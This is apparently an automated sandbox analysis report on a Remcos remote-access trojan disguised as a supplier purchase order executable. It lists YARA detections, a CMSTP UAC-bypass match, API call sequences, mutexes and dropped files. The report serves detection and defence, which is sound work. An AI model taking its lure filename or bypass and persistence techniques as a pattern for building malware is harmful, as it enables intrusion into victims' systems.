                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041CA73 SystemParametersInfoW,12_2_0041CA73

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Supplier Purchase Order - PO0002491.exe
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004167EF
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_019FD4A40_2_019FD4A4
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BD74A00_2_07BD74A0
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BDA3800_2_07BDA380
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BD749B0_2_07BD749B
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BDA3700_2_07BDA370
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BD71700_2_07BD7170
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_07BD716B0_2_07BD716B
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_094578800_2_09457880
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_09459C500_2_09459C50
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_094519200_2_09451920
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_094539E00_2_094539E0
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_094521800_2_09452180
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_094521900_2_09452190
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_094542B80_2_094542B8
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeCode function: 0_2_09451D580_2_09451D58
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_00EED4A48_2_00EED4A4
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_051149D08_2_051149D0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_051149E08_2_051149E0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B66D88_2_076B66D8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B8A988_2_076B8A98
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B66C88_2_076B66C8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B1D4B8_2_076B1D4B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B1D588_2_076B1D58
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B42A78_2_076B42A7
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B42B88_2_076B42B8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B19208_2_076B1920
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B19088_2_076B1908
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B39E08_2_076B39E0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B39D08_2_076B39D0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B21808_2_076B2180
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 8_2_076B21908_2_076B2190
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043706A12_2_0043706A
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041400512_2_00414005
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043E11C12_2_0043E11C
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004541D912_2_004541D9
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004381E812_2_004381E8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041F18B12_2_0041F18B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0044627012_2_00446270
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043E34B12_2_0043E34B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004533AB12_2_004533AB
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0042742E12_2_0042742E
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043756612_2_00437566
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043E5A812_2_0043E5A8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004387F012_2_004387F0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043797E12_2_0043797E
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004339D712_2_004339D7
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0044DA4912_2_0044DA49
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00427AD712_2_00427AD7
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041DBF312_2_0041DBF3
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00427C4012_2_00427C40
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00437DB312_2_00437DB3
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00435EEB12_2_00435EEB
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043DEED12_2_0043DEED
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00426E9F12_2_00426E9F
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: String function: 00401E65 appears 34 times
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: String function: 00434E70 appears 54 times
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: String function: 00434801 appears 41 times
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2160378134.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2175774406.0000000009850000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000000.2095981642.0000000000FB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameldPH.exe& vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exeBinary or memory string: OriginalFilenameldPH.exe& vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: keHuNxIumw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, Wk3seexTX6tZtWvfvc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, Wk3seexTX6tZtWvfvc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/12@1/2
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0041798D
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040F4AF
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041B539
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AADB
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeFile created: C:\Users\user\AppData\Roaming\keHuNxIumw.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GOFAGZ
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9421.tmpJump to behavior
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
